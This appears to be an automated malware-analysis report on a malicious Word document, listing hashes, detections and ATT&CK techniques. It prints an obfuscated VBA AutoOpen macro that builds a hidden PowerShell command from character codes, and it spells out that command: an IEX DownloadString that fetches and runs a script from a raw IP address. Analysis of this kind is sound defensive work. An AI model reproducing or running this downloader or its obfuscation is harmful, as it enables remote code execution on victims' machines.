Office (OLE) malware analysis — malicious · 1ee03ea88b5a7539

MALICIOUS

Office (OLE)

113.8 KB Created: 2018-06-21 16:06:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 26db2e9edbf5cfe7a96184af05eeb7a4 SHA-1: 9bdef64948225e353b119bff09767d47c1928e89 SHA-256: 1ee03ea88b5a75399294f60c87f3464d186dd6229938d0d3acdba45e265cc5e9

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function to execute a PowerShell command. This command is constructed by concatenating character codes to form the string 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://185.143.223.176/a.ps1\')"', which downloads and executes a script from a remote URL. This indicates a downloader or droppper functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6589104-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6589104-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16258 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16258 bytes
SHA-256: `46c328efa62aa573a6cb1f802a667c6eddead205f13f5b0e8a13a3f5e60d7aef`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VzWoimVZKbolW" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "ElECzWfsNkKwQ" Function SRvXBvY() On Error Resume Next For Each AwmETT In CFduRk ZWFsqz = (sWtzFH * 51801 + 10129 * CInt(lkLqr - CDbl(29029)) * 15617 * Oct(19591)) MwroXU = OkCraa = TCIct OLSwh = 84040 + Atn(19286) / 11817 / Round(88071) / 72392 / CInt(OvziB) Next EwoCI = "OwerSHell -j" + "oIn ( " + "[CHar[]](40," + " 89, 77 , 73," + "92 ,103,9" + "9,44,49 ,44, " + "98 ,105" + ", 123," For Each DwYRr In YNwKQ ninPCj = (juGjK * 48097 + 39638 * CInt(rdfdpS - CDbl(914)) * 8565 * Oct(57194)) pWoti = jtOGCX = sQdUHw NsWZj = 70851 + Atn(33395) / 64427 / Round(52576) / 49134 / CInt(iJuMKM) Next wpliQfv = "33 ,99 ,110" + ", 102 ,105,11" + "1, 12" + "0, 44,126," For Each MWzRKO In UimNMz HLGzzP = (wTzRo * 35957 + 46789 * CInt(EjFQi - CDbl(90608)) * 50743 * Oct(35800)) iIdMGi = PcuWz = PKzZOD zVvXG = 48994 + Atn(12400) / 13999 / Round(91825) / 27978 / CInt(htKOrl) Next VAufsC = " 10" + "9,98,104, 99, " + "97," + " 55 , 40 ,70 , " + "118 , " + "124 , 93 ,104, " + "44,49 , 44 ," + " 98,105,123, 3" For Each rofCM In BQQQv JhXSw = (MFFhY * 25114 + 37403 * CInt(vpEdA - CDbl(35903)) * 23035 * Oct(46087)) OVzJX = pIpLd = RKaOC jvJQRj = 97595 + Atn(55232) / 23447 / Round(23086) / 76131 / CInt(cGlKI) Next QZPjdpBTwpi = "3 , 99 , 11" + "0,102,1" + "05,11" + "1 " + ",120" For Each zDojQY In BqIifd wnfcM = (DNKuJd * 40635 + 48578 * CInt(WTGBdP - CDbl(98730)) * 81716 * Oct(93500)) lhQtpz = iYSpaI = KulsuZ DJSTpX = 57961 + Atn(1854) / 99744 / Round(97834) / 93649 / CInt(zbQmUU) Next aufjmfrF = ",44,9" + "5 , 117 ," + " 127, 12" + "0,105,97 , 34" + " ,66 ,105,120,3" + "4, 91 ,105, 1" + "10,7" + "9 ,96 , 1" + "01 , 105 ,98 ,1" For Each cvwHtv In JqidG WshYwZ = (aChYT * 86418 + 84225 * CInt(VuIQX - CDbl(95761)) * 94268 * Oct(82222)) CYXfO = SWsAMF = rnvUWa XnAEz = 77348 + Atn(91293) / 50800 / Round(24946) / 67463 / CInt(ZBaWZB) Next LULYGm = "20" + ",55 ,40 ," + "12" + "6,77 ,98" + ", 121, 102 , " SRvXBvY = EwoCI + wpliQfv + VAufsC + QZPjdpBTwpi + aufjmfrF + LULYGm End Function Function DIbujJIpPMw() On Error Resume Next For Each LOOCb In fFbDUV bWcjO = (TjZss * 17906 + 17203 * CInt(mDTVO - CDbl(87276)) * 99779 * Oct(20700)) zVMIY = MsGrfX = ZrIAi lWWtSp = 85993 + Atn(2920) / 16259 / Round(66123) / 10618 / CInt(DQLcOB) Next dUlMWWaFKO = "125 , 44" + ",49, 44" + " ," + "43 ,1" + "00, 12" For Each ulNAl In dfjib NLLYo = (buSfsE * 18607 + 1507 * CInt(cGrzc - CDbl(13325)) * 69806 * Oct(75697)) YWkbp = IXjVr = srWwm wPtJq = 71050 + Atn(3887) / 871 / Round(47362) / 85408 / CInt(zFdXIA) Next UpusDll = "0 ,120 ,124,54," + "35 , 35,1" + "23 ,123,123" + " , 34, 111 , 9" + "6 , 109" + ",121" + ",104,101,99 ," + "105" For Each sAFHX In XoJwk UwqAl = (JPfzZ * 78332 + 73034 * CInt(qhPOt - CDbl(68508)) * 83343 * Oct(8045)) mBqrY = CbDPJX = IFrzzk saQVGi = 80898 + Atn(46738) / 90081 / Round(10778) / 1688 / CInt(QsDwv) Next LVYwPiIQR = ", " + "127 ,1" + "24," + " 101 , " + "98" + " , 99 , 96,1" + "09,34 ,111" For Each lddYWY In sIYKWt GRNLkV = (tvihzP * 72621 + 13638 * CInt(FGwTOG - CDbl(18553)) * 39388 * Oct(8399)) tNWROY = QRzis = ausiw YJqlST = 6360 + Atn(50903) / 51456 / Round(43131) / 99197 / CInt(tHsbX) Next qntPVcCQjz = ",99 , " + "97,35 " + ",97 ,110 ,88 ," + "53 , 74 ," + "35 , 76 , 10" + "0, 120 ,120, 12" + "4," + " 5" + "4 , " For Each iQIlw In HLNsW VYKdf = (CcEzKz * 71251 + 88482 * CInt(rlkVw - CDbl(44701)) * 41792 * Oct(8127)) imLWdH = KECAa = PbKZvR FLAECQ = 49650 + Atn(54713) / 44426 / Round(45895) / 1709 / CInt(UbvsX) Next ZSErckM = "35 ,35 ,123, 1" + "23 , 123," + " 34,100, 105 , " + "97 ,99,124,96 " + ", 10" + "9, 12" + "7,120, 3" + "4 , 126,121" + " , 3" For Each wzrAti In quVIKY EXdWmG = (Nhinj * 3356 + 374 * CInt(VUint - CDbl(95043)) * 38923 * Oct(78964)) RSLMV = TM ... (truncated)

SHA-256: 46c328efa62aa573a6cb1f802a667c6eddead205f13f5b0e8a13a3f5e60d7aef

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VzWoimVZKbolW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ElECzWfsNkKwQ"
Function SRvXBvY()
On Error Resume Next
For Each AwmETT In CFduRk
ZWFsqz = (sWtzFH * 51801 + 10129 * CInt(lkLqr - CDbl(29029)) * 15617 * Oct(19591))
MwroXU = OkCraa = TCIct
OLSwh = 84040 + Atn(19286) / 11817 / Round(88071) / 72392 / CInt(OvziB)
Next
EwoCI = "OwerSHell  -j" + "oIn ( " + "[CHar[]](40," + " 89, 77 , 73," + "92 ,103,9" + "9,44,49 ,44, " + "98 ,105" + ", 123,"
For Each DwYRr In YNwKQ
ninPCj = (juGjK * 48097 + 39638 * CInt(rdfdpS - CDbl(914)) * 8565 * Oct(57194))
pWoti = jtOGCX = sQdUHw
NsWZj = 70851 + Atn(33395) / 64427 / Round(52576) / 49134 / CInt(iJuMKM)
Next
wpliQfv = "33 ,99 ,110" + ", 102 ,105,11" + "1, 12" + "0, 44,126,"
For Each MWzRKO In UimNMz
HLGzzP = (wTzRo * 35957 + 46789 * CInt(EjFQi - CDbl(90608)) * 50743 * Oct(35800))
iIdMGi = PcuWz = PKzZOD
zVvXG = 48994 + Atn(12400) / 13999 / Round(91825) / 27978 / CInt(htKOrl)
Next
VAufsC = " 10" + "9,98,104, 99, " + "97," + " 55 , 40 ,70 , " + "118 , " + "124 , 93 ,104, " + "44,49 , 44 ," + " 98,105,123, 3"
For Each rofCM In BQQQv
JhXSw = (MFFhY * 25114 + 37403 * CInt(vpEdA - CDbl(35903)) * 23035 * Oct(46087))
OVzJX = pIpLd = RKaOC
jvJQRj = 97595 + Atn(55232) / 23447 / Round(23086) / 76131 / CInt(cGlKI)
Next
QZPjdpBTwpi = "3 , 99 , 11" + "0,102,1" + "05,11" + "1 " + ",120"
For Each zDojQY In BqIifd
wnfcM = (DNKuJd * 40635 + 48578 * CInt(WTGBdP - CDbl(98730)) * 81716 * Oct(93500))
lhQtpz = iYSpaI = KulsuZ
DJSTpX = 57961 + Atn(1854) / 99744 / Round(97834) / 93649 / CInt(zbQmUU)
Next
aufjmfrF = ",44,9" + "5 , 117 ," + " 127, 12" + "0,105,97 , 34" + " ,66 ,105,120,3" + "4, 91 ,105, 1" + "10,7" + "9 ,96 , 1" + "01 , 105 ,98 ,1"
For Each cvwHtv In JqidG
WshYwZ = (aChYT * 86418 + 84225 * CInt(VuIQX - CDbl(95761)) * 94268 * Oct(82222))
CYXfO = SWsAMF = rnvUWa
XnAEz = 77348 + Atn(91293) / 50800 / Round(24946) / 67463 / CInt(ZBaWZB)
Next
LULYGm = "20" + ",55 ,40 ," + "12" + "6,77 ,98" + ", 121, 102 , "
SRvXBvY = EwoCI + wpliQfv + VAufsC + QZPjdpBTwpi + aufjmfrF + LULYGm
End Function
Function DIbujJIpPMw()
On Error Resume Next
For Each LOOCb In fFbDUV
bWcjO = (TjZss * 17906 + 17203 * CInt(mDTVO - CDbl(87276)) * 99779 * Oct(20700))
zVMIY = MsGrfX = ZrIAi
lWWtSp = 85993 + Atn(2920) / 16259 / Round(66123) / 10618 / CInt(DQLcOB)
Next
dUlMWWaFKO = "125 , 44" + ",49, 44" + " ," + "43 ,1" + "00, 12"
For Each ulNAl In dfjib
NLLYo = (buSfsE * 18607 + 1507 * CInt(cGrzc - CDbl(13325)) * 69806 * Oct(75697))
YWkbp = IXjVr = srWwm
wPtJq = 71050 + Atn(3887) / 871 / Round(47362) / 85408 / CInt(zFdXIA)
Next
UpusDll = "0 ,120 ,124,54," + "35 , 35,1" + "23 ,123,123" + " , 34, 111 , 9" + "6 , 109" + ",121" + ",104,101,99 ," + "105"
For Each sAFHX In XoJwk
UwqAl = (JPfzZ * 78332 + 73034 * CInt(qhPOt - CDbl(68508)) * 83343 * Oct(8045))
mBqrY = CbDPJX = IFrzzk
saQVGi = 80898 + Atn(46738) / 90081 / Round(10778) / 1688 / CInt(QsDwv)
Next
LVYwPiIQR = ", " + "127 ,1" + "24," + " 101 , " + "98" + " , 99 , 96,1" + "09,34 ,111"
For Each lddYWY In sIYKWt
GRNLkV = (tvihzP * 72621 + 13638 * CInt(FGwTOG - CDbl(18553)) * 39388 * Oct(8399))
tNWROY = QRzis = ausiw
YJqlST = 6360 + Atn(50903) / 51456 / Round(43131) / 99197 / CInt(tHsbX)
Next
qntPVcCQjz = ",99 , " + "97,35 " + ",97 ,110 ,88 ," + "53 , 74 ," + "35 , 76 , 10" + "0, 120 ,120, 12" + "4," + " 5" + "4 , "
For Each iQIlw In HLNsW
VYKdf = (CcEzKz * 71251 + 88482 * CInt(rlkVw - CDbl(44701)) * 41792 * Oct(8127))
imLWdH = KECAa = PbKZvR
FLAECQ = 49650 + Atn(54713) / 44426 / Round(45895) / 1709 / CInt(UbvsX)
Next
ZSErckM = "35 ,35 ,123, 1" + "23 , 123," + " 34,100, 105 , " + "97 ,99,124,96 " + ", 10" + "9, 12" + "7,120, 3" + "4 , 126,121" + " , 3"
For Each wzrAti In quVIKY
EXdWmG = (Nhinj * 3356 + 374 * CInt(VUint - CDbl(95043)) * 38923 * Oct(78964))
RSLMV = TM
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.